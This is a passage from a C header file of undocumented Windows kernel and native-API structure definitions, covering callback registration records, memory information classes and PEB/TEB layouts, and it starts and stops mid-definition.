LARGE_INTEGER Cookie;
PVOID CallerContext;
PEX_CALLBACK_FUNCTION Function;
UNICODE_STRING Altitude;
LIST_ENTRY ObjectContextListHead;
} CM_CALLBACK_CONTEXT_BLOCK, *PCM_CALLBACK_CONTEXT_BLOCK;
typedef struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION {
struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION *Next;
PVOID CallbackRoutine; //PSE_LOGON_SESSION_TERMINATED_ROUTINE
} SEP_LOGON_SESSION_TERMINATED_NOTIFICATION, *PSEP_LOGON_SESSION_TERMINATED_NOTIFICATION;
typedef struct _NOTIFICATION_PACKET {
LIST_ENTRY ListEntry;
PVOID DriverObject; //PDRIVER_OBJECT
PVOID NotificationRoutine; //PDRIVER_FS_NOTIFICATION
} NOTIFICATION_PACKET, *PNOTIFICATION_PACKET;
typedef struct _SHUTDOWN_PACKET {
LIST_ENTRY ListEntry;
PVOID DeviceObject; //PDEVICE_OBJECT
} SHUTDOWN_PACKET, *PSHUTDOWN_PACKET;
#define EX_CALLBACK_SIGNATURE 'llaC'
typedef struct _CALLBACK_OBJECT {
ULONG Signature;
KSPIN_LOCK Lock;
LIST_ENTRY RegisteredCallbacks;
BOOLEAN AllowMultipleCallbacks;
UCHAR reserved[3];
} CALLBACK_OBJECT, *PCALLBACK_OBJECT;
// Since 8.1
typedef struct _CALLBACK_OBJECT_V2 {
ULONG Signature;
KSPIN_LOCK Lock;
LIST_ENTRY RegisteredCallbacks;
BOOLEAN AllowMultipleCallbacks;
LIST_ENTRY ExpCallbackList;
} CALLBACK_OBJECT_V2, * PCALLBACK_OBJECT_V2;
typedef struct _CALLBACK_REGISTRATION {
LIST_ENTRY Link;
PCALLBACK_OBJECT CallbackObject;
PVOID CallbackFunction; //PCALLBACK_FUNCTION
PVOID CallbackContext;
ULONG Busy;
BOOLEAN UnregisterWaiting;
} CALLBACK_REGISTRATION, *PCALLBACK_REGISTRATION;
typedef ULONG OB_OPERATION;
#define OB_OPERATION_HANDLE_CREATE 0x00000001
#define OB_OPERATION_HANDLE_DUPLICATE 0x00000002
typedef struct _OB_CALLBACK_CONTEXT_BLOCK {
LIST_ENTRY CallbackListEntry;
OB_OPERATION Operations;
ULONG Flags;
struct _OB_REGISTRATION* Registration;
POBJECT_TYPE ObjectType;
PVOID PreCallback;
PVOID PostCallback;
EX_RUNDOWN_REF RundownReference;
} OB_CALLBACK_CONTEXT_BLOCK, *POB_CALLBACK_CONTEXT_BLOCK;
typedef struct _OB_REGISTRATION {
USHORT Version;
USHORT RegistrationCount;
PVOID RegistrationContext;
UNICODE_STRING Altitude;
OB_CALLBACK_CONTEXT_BLOCK* CallbackContext;
} OB_REGISTRATION, * POB_REGISTRATION;
#define PO_POWER_SETTINGS_REGISTRATION_TAG 'teSP'
typedef struct _POP_POWER_SETTING_REGISTRATION_V1 {
LIST_ENTRY Link;
ULONG Tag;
PVOID CallbackThread; //PKTHREAD
UCHAR UnregisterOnReturn;
UCHAR UnregisterPending;
GUID Guid;
PVOID LastValue; //PPOP_POWER_SETTING_VALUE
PVOID Callback;
PVOID Context;
PDEVICE_OBJECT DeviceObject;
} POP_POWER_SETTING_REGISTRATION_V1, *PPOP_POWER_SETTING_REGISTRATION_V1;
//
// WARNING: this structure definition is incomplete.
// Tail is incorrect/incomplete for newest Win10 versions.
//
typedef struct _POP_POWER_SETTING_REGISTRATION_V2 {
LIST_ENTRY Link;
ULONG Tag;
PVOID CallbackThread; //PKTHREAD
UCHAR UnregisterOnReturn;
UCHAR UnregisterPending;
GUID Guid;
GUID Guid2;
PVOID LastValue; //PPOP_POWER_SETTING_VALUE
PVOID Callback;
PVOID Context;
PDEVICE_OBJECT DeviceObject;
} POP_POWER_SETTING_REGISTRATION_V2, *PPOP_POWER_SETTING_REGISTRATION_V2;
typedef struct _RTL_CALLBACK_REGISTER {
ULONG Flags;
EX_RUNDOWN_REF RundownReference;
PVOID DebugPrintCallback;
LIST_ENTRY ListEntry;
} RTL_CALLBACK_REGISTER, *PRTL_CALLBACK_REGISTER;
typedef
VOID
(*PPO_COALESCING_CALLBACK) (
_In_ ULONG Reason,
_In_ PDEVICE_OBJECT DeviceObject,
_In_ PVOID Context);
typedef struct _PO_COALESCING_CALLBACK_V1 {
EX_PUSH_LOCK PushLock;
PVOID CoalescingCallback;
PVOID SelfPtr;
PPO_COALESCING_CALLBACK Callback;
BOOLEAN ClientOrServer;
PVOID Context;
} PO_COALESCING_CALLBACK_V1, * PPO_COALESCING_CALLBACK_V1;
typedef struct _PO_COALESCING_CALLBACK_V2 {
EX_PUSH_LOCK PushLock;
PVOID CoalescingCallback;
PVOID SelfPtr;
PPO_COALESCING_CALLBACK Callback;
BOOLEAN ClientOrServer;
PVOID Context;
LIST_ENTRY Link;
EX_CALLBACK ExCallback;
} PO_COALESCING_CALLBACK_V2, * PPO_COALESCING_CALLBACK_V2;
typedef
BOOLEAN
(*PNMI_CALLBACK)(
__in_opt PVOID Context,
__in BOOLEAN Handled
);
typedef struct _KNMI_HANDLER_CALLBACK {
struct _KNMI_HANDLER_CALLBACK* Next;
PNMI_CALLBACK Callback;
PVOID Context;
PVOID Handle;
} KNMI_HANDLER_CALLBACK, * PKNMI_HANDLER_CALLBACK;
typedef
NTSTATUS
(NTAPI* SILO_MONITOR_CREATE_CALLBACK)(
_In_ PESILO Silo
);
typedef
VOID
(NTAPI* SILO_MONITOR_TERMINATE_CALLBACK)(
_In_ PESILO Silo
);
#define SILO_MONITOR_REGISTRATION_VERSION (1)
typedef struct _SERVER_SILO_MONITOR {
LIST_ENTRY ListEntry;
UCHAR Version;
BOOLEAN MonitorHost;
BOOLEAN MonitorExistingSilos;
UCHAR Reserved[5];
SILO_MONITOR_CREATE_CALLBACK CreateCallback;
SILO_MONITOR_TERMINATE_CALLBACK TerminateCallback;
union {
PUNICODE_STRING DriverObjectName;
PUNICODE_STRING ComponentName;
};
} SERVER_SILO_MONITOR, * PSERVER_SILO_MONITOR;
//
// Errata Manager
//
typedef struct _EMP_CALLBACK_DB_RECORD {
GUID CallbackId;
PVOID CallbackFunc;
LONG_PTR CallbackFuncReference;
PVOID Context;
SINGLE_LIST_ENTRY List;
SINGLE_LIST_ENTRY CallbackDependencyListHead;
ULONG NumberOfStrings;
ULONG NumberOfNumerics;
ULONG NumberOfEntries;
struct _EMP_ENTRY_DB_RECORD* EntryList[1];
} EMP_CALLBACK_DB_RECORD, * PEMP_CALLBACK_DB_RECORD;
typedef struct _EMP_CALLBACK_LIST_ENTRY {
EMP_CALLBACK_DB_RECORD* CallbackRecord;
SINGLE_LIST_ENTRY CallbackListEntry;
} EMP_CALLBACK_LIST_ENTRY, * PEMP_CALLBACK_LIST_ENTRY;
typedef enum _IO_NOTIFICATION_EVENT_CATEGORY {
EventCategoryReserved,
EventCategoryHardwareProfileChange,
EventCategoryDeviceInterfaceChange,
EventCategoryTargetDeviceChange
} IO_NOTIFICATION_EVENT_CATEGORY;
typedef
NTSTATUS
(*PDRIVER_NOTIFICATION_CALLBACK_ROUTINE) (
IN PVOID NotificationStructure,
IN PVOID Context
);
typedef struct _KGUARDED_MUTEX {
LONG Count;
PKTHREAD Owner;
ULONG Contention;
KEVENT Event;
union {
struct {
SHORT KernelApcDisable;
SHORT SpecialApcDisable;
};
ULONG CombinedApcDisable;
};
} KGUARDED_MUTEX, * PKGUARDED_MUTEX;
typedef struct _DEVICE_CLASS_NOTIFY_ENTRY {
//
// Header entries
//
LIST_ENTRY ListEntry;
IO_NOTIFICATION_EVENT_CATEGORY EventCategory;
ULONG SessionId;
HANDLE SessionHandle;
PDRIVER_NOTIFICATION_CALLBACK_ROUTINE CallbackRoutine;
PVOID Context;
PDRIVER_OBJECT DriverObject;
USHORT RefCount;
BOOLEAN Unregistered;
PKGUARDED_MUTEX Lock;
PERESOURCE EntryLock;
//
// ClassGuid - the guid of the device class we are interested in
//
GUID ClassGuid;
} DEVICE_CLASS_NOTIFY_ENTRY, * PDEVICE_CLASS_NOTIFY_ENTRY;
/*
** Callbacks END
*/
/*
* NTQSI Modules START
*/
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
typedef struct _RTL_PROCESS_MODULE_INFORMATION_EX {
USHORT NextOffset;
RTL_PROCESS_MODULE_INFORMATION BaseInfo;
ULONG ImageChecksum;
ULONG TimeDateStamp;
PVOID DefaultBase;
} RTL_PROCESS_MODULE_INFORMATION_EX, *PRTL_PROCESS_MODULE_INFORMATION_EX;
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
/*
* NTQSI Modules END
*/
/*
** Virtual Memory START
*/
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation = 0,
MemoryWorkingSetInformation,
MemoryMappedFilenameInformation,
MemoryRegionInformation,
MemoryWorkingSetExInformation,
MemorySharedCommitInformation,
MemoryImageInformation,
MemoryRegionInformationEx,
MemoryPrivilegedBasicInformation,
MemoryEnclaveImageInformation,
MemoryBasicInformationCapped,
MemoryPhysicalContiguityInformation,
MemoryBadInformation,
MemoryBadInformationAllProcesses,
MaxMemoryInfoClass
} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;
typedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS {
VmPrefetchInformation,
VmPagePriorityInformation,
VmCfgCallTargetInformation,
VmPageDirtyStateInformation
} VIRTUAL_MEMORY_INFORMATION_CLASS;
typedef struct _MEMORY_REGION_INFORMATION {
PVOID AllocationBase;
ULONG AllocationProtect;
union
{
ULONG RegionType;
struct
{
ULONG Private : 1;
ULONG MappedDataFile : 1;
ULONG MappedImage : 1;
ULONG MappedPageFile : 1;
ULONG MappedPhysical : 1;
ULONG DirectMapped : 1;
ULONG SoftwareEnclave : 1;
ULONG PageSize64K : 1;
ULONG Reserved : 24;
};
};
SIZE_T RegionSize;
SIZE_T CommitSize;
} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION;
typedef struct _MEMORY_REGION_INFORMATION_V2 {
PVOID AllocationBase;
ULONG AllocationProtect;
union
{
ULONG RegionType;
struct
{
ULONG Private : 1;
ULONG MappedDataFile : 1;
ULONG MappedImage : 1;
ULONG MappedPageFile : 1;
ULONG MappedPhysical : 1;
ULONG DirectMapped : 1;
ULONG SoftwareEnclave : 1; // RS3
ULONG PageSize64K : 1;
ULONG Reserved : 24;
};
};
SIZE_T RegionSize;
SIZE_T CommitSize;
ULONG_PTR PartitionId; // 19H1
} MEMORY_REGION_INFORMATION_V2, * PMEMORY_REGION_INFORMATION_V2;
typedef struct _MEMORY_REGION_INFORMATION_V3 {
PVOID AllocationBase;
ULONG AllocationProtect;
union
{
ULONG RegionType;
struct
{
ULONG Private : 1;
ULONG MappedDataFile : 1;
ULONG MappedImage : 1;
ULONG MappedPageFile : 1;
ULONG MappedPhysical : 1;
ULONG DirectMapped : 1;
ULONG SoftwareEnclave : 1; // RS3
ULONG PageSize64K : 1;
ULONG PlaceholderReservation : 1; // RS4
ULONG MappedAwe : 1; // 21H1
ULONG MappedWriteWatch : 1;
ULONG PageSizeLarge : 1;
ULONG PageSizeHuge : 1;
ULONG Reserved : 19;
};
};
SIZE_T RegionSize;
SIZE_T CommitSize;
ULONG_PTR PartitionId; // 19H1
ULONG_PTR NodePreference; // 20H1
} MEMORY_REGION_INFORMATION_V3, * PMEMORY_REGION_INFORMATION_V3;
typedef struct _MEMORY_RANGE_ENTRY {
PVOID VirtualAddress;
SIZE_T NumberOfBytes;
} MEMORY_RANGE_ENTRY, *PMEMORY_RANGE_ENTRY;
typedef struct _MEMORY_IMAGE_INFORMATION {
PVOID ImageBase;
SIZE_T SizeOfImage;
union
{
ULONG ImageFlags;
struct
{
ULONG ImagePartialMap : 1;
ULONG ImageNotExecutable : 1;
ULONG ImageSigningLevel : 4; // RS3
ULONG ImageExtensionPresent : 1; // 24H2
ULONG Reserved : 25;
};
};
} MEMORY_IMAGE_INFORMATION, * PMEMORY_IMAGE_INFORMATION;
typedef struct _MEMORY_ENCLAVE_IMAGE_INFORMATION {
MEMORY_IMAGE_INFORMATION ImageInfo;
UCHAR UniqueID[32];
UCHAR AuthorID[32];
} MEMORY_ENCLAVE_IMAGE_INFORMATION, * PMEMORY_ENCLAVE_IMAGE_INFORMATION;
typedef struct _MEMORY_WORKING_SET_BLOCK {
ULONG_PTR Protection : 5;
ULONG_PTR ShareCount : 3;
ULONG_PTR Shared : 1;
ULONG_PTR Node : 3;
#ifdef _WIN64
ULONG_PTR VirtualPage : 52;
#else
ULONG VirtualPage : 20;
#endif
} MEMORY_WORKING_SET_BLOCK, * PMEMORY_WORKING_SET_BLOCK;
typedef struct _MEMORY_WORKING_SET_INFORMATION {
ULONG_PTR NumberOfEntries;
_Field_size_(NumberOfEntries) MEMORY_WORKING_SET_BLOCK WorkingSetInfo[1];
} MEMORY_WORKING_SET_INFORMATION, * PMEMORY_WORKING_SET_INFORMATION;
typedef struct _MEMORY_WORKING_SET_EX_BLOCK {
union {
struct {
ULONG_PTR Valid : 1;
ULONG_PTR ShareCount : 3;
ULONG_PTR Win32Protection : 11;
ULONG_PTR Shared : 1;
ULONG_PTR Node : 6;
ULONG_PTR Locked : 1;
ULONG_PTR LargePage : 1;
ULONG_PTR Priority : 3;
ULONG_PTR Reserved : 3;
ULONG_PTR SharedOriginal : 1;
ULONG_PTR Bad : 1;
ULONG_PTR Win32GraphicsProtection : 4;
#ifdef _WIN64
ULONG_PTR ReservedUlong : 28;
#endif
};
struct {
ULONG_PTR Valid : 1;
ULONG_PTR Reserved0 : 14;
ULONG_PTR Shared : 1;
ULONG_PTR Reserved1 : 5;
ULONG_PTR PageTable : 1;
ULONG_PTR Location : 2;
ULONG_PTR Priority : 3;
ULONG_PTR ModifiedList : 1;
ULONG_PTR Reserved2 : 2;
ULONG_PTR SharedOriginal : 1;
ULONG_PTR Bad : 1;
#ifdef _WIN64
ULONG_PTR ReservedUlong : 32;
#endif
} Invalid;
};
} MEMORY_WORKING_SET_EX_BLOCK, * PMEMORY_WORKING_SET_EX_BLOCK;
typedef struct _MEMORY_WORKING_SET_EX_INFORMATION {
PVOID VirtualAddress;
union {
MEMORY_WORKING_SET_EX_BLOCK VirtualAttributes;
ULONG_PTR Long;
} u1;
} MEMORY_WORKING_SET_EX_INFORMATION, * PMEMORY_WORKING_SET_EX_INFORMATION;
#define MM_ZERO_ACCESS 0 // this value is not used.
#define MM_READONLY 1
#define MM_EXECUTE 2
#define MM_EXECUTE_READ 3
#define MM_READWRITE 4 // bit 2 is set if this is writable.
#define MM_WRITECOPY 5
#define MM_EXECUTE_READWRITE 6
#define MM_EXECUTE_WRITECOPY 7
#define MM_NOCACHE 0x8
#define MM_GUARD_PAGE 0x10
#define MM_DECOMMIT 0x10 // NO_ACCESS, Guard page
#define MM_NOACCESS 0x18 // NO_ACCESS, Guard_page, nocache.
#define MM_UNKNOWN_PROTECTION 0x100 // bigger than 5 bits!
#define MM_INVALID_PROTECTION ((ULONG)-1) // bigger than 5 bits!
#define MM_PROTECTION_WRITE_MASK 4
#define MM_PROTECTION_COPY_MASK 1
#define MM_PROTECTION_OPERATION_MASK 7 // mask off guard page and nocache.
#define MM_PROTECTION_EXECUTE_MASK 2
#define MM_SECURE_DELETE_CHECK 0x55
/*
** Virtual Memory END
*/
/*
** System Firmware START
*/
typedef enum _SYSTEM_FIRMWARE_TABLE_ACTION {
SystemFirmwareTable_Enumerate,
SystemFirmwareTable_Get,
SystemFirmwareTableMax
} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION;
typedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION {
ULONG ProviderSignature;
SYSTEM_FIRMWARE_TABLE_ACTION Action;
ULONG TableID;
ULONG TableBufferLength;
UCHAR TableBuffer[ANYSIZE_ARRAY];
} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION;
/*
** System Firmware END
*/
//
// PEB/TEB
//
#define GDI_HANDLE_BUFFER_SIZE32 34
#define GDI_HANDLE_BUFFER_SIZE64 60
#if !defined(_M_X64)
#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32
#else
#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64
#endif
typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
// 32-bit definitions
typedef struct _STRING32 {
USHORT Length;
USHORT MaximumLength;
ULONG Buffer;
} STRING32;
typedef STRING32 *PSTRING32;
typedef STRING32 UNICODE_STRING32;
#if (_MSC_VER < 1300) && !defined(_WINDOWS_)
typedef struct LIST_ENTRY32 {
DWORD Flink;
DWORD Blink;
} LIST_ENTRY32;
typedef LIST_ENTRY32 *PLIST_ENTRY32;
typedef struct LIST_ENTRY64 {
ULONGLONG Flink;
ULONGLONG Blink;
} LIST_ENTRY64;
typedef LIST_ENTRY64 *PLIST_ENTRY64;
#endif
#define WOW64_POINTER(Type) ULONG
typedef struct _PEB_LDR_DATA32 {
ULONG Length;
BOOLEAN Initialized;
WOW64_POINTER(HANDLE) SsHandle;
LIST_ENTRY32 InLoadOrderModuleList;
LIST_ENTRY32 InMemoryOrderModuleList;
LIST_ENTRY32 InInitializationOrderModuleList;
WOW64_POINTER(PVOID) EntryInProgress;
BOOLEAN ShutdownInProgress;
WOW64_POINTER(HANDLE) ShutdownThreadId;
} PEB_LDR_DATA32, *PPEB_LDR_DATA32;
#define LDR_DATA_TABLE_ENTRY_SIZE_WINXP32 FIELD_OFFSET( LDR_DATA_TABLE_ENTRY32, ForwarderLinks )
typedef struct _LDR_DATA_TABLE_ENTRY32 {
LIST_ENTRY32 InLoadOrderLinks;
LIST_ENTRY32 InMemoryOrderLinks;
LIST_ENTRY32 InInitializationOrderLinks;
WOW64_POINTER(PVOID) DllBase;
WOW64_POINTER(PVOID) EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING32 FullDllName;
UNICODE_STRING32 BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT TlsIndex;
union
{
LIST_ENTRY32 HashLinks;
struct
{
WOW64_POINTER(PVOID) SectionPointer;
ULONG CheckSum;
};
};
union
{
ULONG TimeDateStamp;
WOW64_POINTER(PVOID) LoadedImports;
};
WOW64_POINTER(PVOID) EntryPointActivationContext;
WOW64_POINTER(PVOID) PatchInformation;
LIST_ENTRY32 ForwarderLinks;
LIST_ENTRY32 ServiceTagLinks;
LIST_ENTRY32 StaticLinks;
WOW64_POINTER(PVOID) ContextInformation;
WOW64_POINTER(ULONG_PTR) OriginalBase;
LARGE_INTEGER LoadTime;
} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;
typedef struct _CURDIR32 {
UNICODE_STRING32 DosPath;
WOW64_POINTER(HANDLE) Handle;
} CURDIR32, *PCURDIR32;
typedef struct _RTL_DRIVE_LETTER_CURDIR32 {
USHORT Flags;
USHORT Length;
ULONG TimeStamp;
STRING32 DosPath;
} RTL_DRIVE_LETTER_CURDIR32, *PRTL_DRIVE_LETTER_CURDIR32;
typedef struct _RTL_USER_PROCESS_PARAMETERS32 {
ULONG MaximumLength;
ULONG Length;
ULONG Flags;
ULONG DebugFlags;
WOW64_POINTER(HANDLE) ConsoleHandle;
ULONG ConsoleFlags;
WOW64_POINTER(HANDLE) StandardInput;
WOW64_POINTER(HANDLE) StandardOutput;
WOW64_POINTER(HANDLE) StandardError;
CURDIR32 CurrentDirectory;
UNICODE_STRING32 DllPath;
UNICODE_STRING32 ImagePathName;
UNICODE_STRING32 CommandLine;
WOW64_POINTER(PVOID) Environment;
ULONG StartingX;
ULONG StartingY;
ULONG CountX;
ULONG CountY;
ULONG CountCharsX;
ULONG CountCharsY;
ULONG FillAttribute;
ULONG WindowFlags;
ULONG ShowWindowFlags;
UNICODE_STRING32 WindowTitle;
UNICODE_STRING32 DesktopInfo;
UNICODE_STRING32 ShellInfo;
UNICODE_STRING32 RuntimeData;
RTL_DRIVE_LETTER_CURDIR32 CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
ULONG EnvironmentSize;
ULONG EnvironmentVersion;
} RTL_USER_PROCESS_PARAMETERS32, *PRTL_USER_PROCESS_PARAMETERS32;
typedef struct _PEB32 {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
union
{
BOOLEAN BitField;
struct
{
BOOLEAN ImageUsesLargePages : 1;
BOOLEAN IsProtectedProcess : 1;
BOOLEAN IsLegacyProcess : 1;
BOOLEAN IsImageDynamicallyRelocated : 1;
BOOLEAN SkipPatchingUser32Forwarders : 1;
BOOLEAN SpareBits : 3;
};
};
WOW64_POINTER(HANDLE) Mutant;
WOW64_POINTER(PVOID) ImageBaseAddress;
WOW64_POINTER(PPEB_LDR_DATA) Ldr;
WOW64_POINTER(PRTL_USER_PROCESS_PARAMETERS) ProcessParameters;
WOW64_POINTER(PVOID) SubSystemData;
WOW64_POINTER(PVOID) ProcessHeap;
WOW64_POINTER(PRTL_CRITICAL_SECTION) FastPebLock;
WOW64_POINTER(PVOID) AtlThunkSListPtr;
WOW64_POINTER(PVOID) IFEOKey;
union
{
ULONG CrossProcessFlags;
struct
{
ULONG ProcessInJob : 1;
ULONG ProcessInitializing : 1;
ULONG ProcessUsingVEH : 1;
ULONG ProcessUsingVCH : 1;
ULONG ProcessUsingFTH : 1;
ULONG ProcessPreviouslyThrottled : 1;
ULONG ProcessCurrentlyThrottled : 1;
ULONG ReservedBits0 : 25;
};
ULONG EnvironmentUpdateCount;
};
union
{
WOW64_POINTER(PVOID) KernelCallbackTable;
WOW64_POINTER(PVOID) UserSharedInfoPtr;
};
ULONG SystemReserved[1];
ULONG AtlThunkSListPtr32;
WOW64_POINTER(PVOID) ApiSetMap;
ULONG TlsExpansionCounter;
WOW64_POINTER(PVOID) TlsBitmap;
ULONG TlsBitmapBits[2];
WOW64_POINTER(PVOID) ReadOnlySharedMemoryBase;
WOW64_POINTER(PVOID) HotpatchInformation;
WOW64_POINTER(PPVOID) ReadOnlyStaticServerData;
WOW64_POINTER(PVOID) AnsiCodePageData;
WOW64_POINTER(PVOID) OemCodePageData;
WOW64_POINTER(PVOID) UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
LARGE_INTEGER CriticalSectionTimeout;
WOW64_POINTER(SIZE_T) HeapSegmentReserve;
WOW64_POINTER(SIZE_T) HeapSegmentCommit;
WOW64_POINTER(SIZE_T) HeapDeCommitTotalFreeThreshold;
WOW64_POINTER(SIZE_T) HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
WOW64_POINTER(PPVOID) ProcessHeaps;
WOW64_POINTER(PVOID) GdiSharedHandleTable;
WOW64_POINTER(PVOID) ProcessStarterHelper;
ULONG GdiDCAttributeList;
WOW64_POINTER(PRTL_CRITICAL_SECTION) LoaderLock;
ULONG OSMajorVersion;
ULONG OSMinorVersion;
USHORT OSBuildNumber;
USHORT OSCSDVersion;
ULONG OSPlatformId;
ULONG ImageSubsystem;
ULONG ImageSubsystemMajorVersion;
ULONG ImageSubsystemMinorVersion;
WOW64_POINTER(ULONG_PTR) ImageProcessAffinityMask;
GDI_HANDLE_BUFFER32 GdiHandleBuffer;
WOW64_POINTER(PVOID) PostProcessInitRoutine;
WOW64_POINTER(PVOID) TlsExpansionBitmap;
ULONG TlsExpansionBitmapBits[32];
ULONG SessionId;
// Rest of structure not included.
} PEB32, *PPEB32;
#define GDI_BATCH_BUFFER_SIZE 310
typedef struct _GDI_TEB_BATCH32 {
ULONG Offset;
WOW64_POINTER(ULONG_PTR) HDC;
ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
} GDI_TEB_BATCH32, *PGDI_TEB_BATCH32;
#if (_MSC_VER < 1300) && !defined(_WINDOWS_)
//
// 32 and 64 bit specific version for wow64 and the debugger
//
typedef struct _NT_TIB32 {
DWORD ExceptionList;
DWORD StackBase;
DWORD StackLimit;
DWORD SubSystemTib;
union {
DWORD FiberData;
DWORD Version;
};
DWORD ArbitraryUserPointer;
DWORD Self;
} NT_TIB32, *PNT_TIB32;
typedef struct _NT_TIB64 {
DWORD64 ExceptionList;
DWORD64 StackBase;
DWORD64 StackLimit;
DWORD64 SubSystemTib;
union {
DWORD64 FiberData;
DWORD Version;
};
DWORD64 ArbitraryUserPointer;
DWORD64 Self;
} NT_TIB64, *PNT_TIB64;
#endif
typedef struct _TEB32 {
NT_TIB32 NtTib;
WOW64_POINTER(PVOID) EnvironmentPointer;
CLIENT_ID32 ClientId;
WOW64_POINTER(PVOID) ActiveRpcHandle;
WOW64_POINTER(PVOID) ThreadLocalStoragePointer;
WOW64_POINTER(PPEB) ProcessEnvironmentBlock;
ULONG LastErrorValue;
ULONG CountOfOwnedCriticalSections;
WOW64_POINTER(PVOID) CsrClientThread;
WOW64_POINTER(PVOID) Win32ThreadInfo;
ULONG User32Reserved[26];
ULONG UserReserved[5];
WOW64_POINTER(PVOID) WOW32Reserved;
LCID CurrentLocale;
ULONG FpSoftwareStatusRegister;
WOW64_POINTER(PVOID) SystemReserved1[54];
NTSTATUS ExceptionCode;
WOW64_POINTER(PVOID) ActivationContextStackPointer;
BYTE SpareBytes[36];
ULONG TxFsContext;
GDI_TEB_BATCH32 GdiTebBatch;
CLIENT_ID32 RealClientId;
WOW64_POINTER(HANDLE) GdiCachedProcessHandle;
ULONG GdiClientPID;
ULONG GdiClientTID;
WOW64_POINTER(PVOID) GdiThreadLocalInfo;
WOW64_POINTER(ULONG_PTR) Win32ClientInfo[62];
WOW64_POINTER(PVOID) glDispatchTable[233];
WOW64_POINTER(ULONG_PTR) glReserved1[29];
WOW64_POINTER(PVOID) glReserved2;
WOW64_POINTER(PVOID) glSectionInfo;
WOW64_POINTER(PVOID) glSection;
WOW64_POINTER(PVOID) glTable;
WOW64_POINTER(PVOID) glCurrentRC;
WOW64_POINTER(PVOID) glContext;
NTSTATUS LastStatusValue;
UNICODE_STRING32 StaticUnicodeString;
WCHAR StaticUnicodeBuffer[261];
WOW64_POINTER(PVOID) DeallocationStack;
WOW64_POINTER(PVOID) TlsSlots[64];
LIST_ENTRY32 TlsLinks;
} TEB32, *PTEB32;
typedef struct _PEB_LDR_DATA {
ULONG Length;
BOOLEAN Initialized;
HANDLE SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID EntryInProgress;
BOOLEAN ShutdownInProgress;
HANDLE ShutdownThreadId;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
#ifndef FLS_MAXIMUM_AVAILABLE
#define FLS_MAXIMUM_AVAILABLE 128
#endif
#ifndef TLS_MINIMUM_AVAILABLE
#define TLS_MINIMUM_AVAILABLE 64
#endif
#ifndef TLS_EXPANSION_SLOTS
#define TLS_EXPANSION_SLOTS 1024
#endif
#ifndef DOS_MAX_COMPONENT_LENGTH
#define DOS_MAX_COMPONENT_LENGTH 255
#endif
#ifndef DOS_MAX_PATH_LENGTH
#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)
#endif
typedef struct _ACTIVATION_CONTEXT_DATA * PACTIVATION_CONTEXT_DATA;
typedef struct _ASSEMBLY_STORAGE_MAP * PASSEMBLY_STORAGE_MAP;
typedef struct _CURDIR {
UNICODE_STRING DosPath;
HANDLE Handle;
} CURDIR, *PCURDIR;
#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002
#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003
typedef struct _RTL_DRIVE_LETTER_CURDIR {
USHORT Flags;
USHORT Length;
ULONG TimeStamp;
STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
ULONG MaximumLength;
ULONG Length;
ULONG Flags;
ULONG DebugFlags;
HANDLE ConsoleHandle;
ULONG ConsoleFlags;
HANDLE StandardInput;
HANDLE StandardOutput;
HANDLE StandardError;
CURDIR CurrentDirectory;
UNICODE_STRING DllPath;
UNICODE_STRING ImagePathName;
UNICODE_STRING CommandLine;
PVOID Environment;
ULONG StartingX;
ULONG StartingY;
ULONG CountX;
ULONG CountY;
ULONG CountCharsX;
ULONG CountCharsY;
ULONG FillAttribute;
ULONG WindowFlags;
ULONG ShowWindowFlags;
UNICODE_STRING WindowTitle;
UNICODE_STRING DesktopInfo;
UNICODE_STRING ShellInfo;
UNICODE_STRING RuntimeData;
RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
ULONG_PTR EnvironmentSize;
ULONG_PTR EnvironmentVersion;
PVOID PackageDependencyData;
ULONG ProcessGroupId;
ULONG LoaderThreads;
UNICODE_STRING RedirectionDllName; // RS4
UNICODE_STRING HeapPartitionName; // 19H1
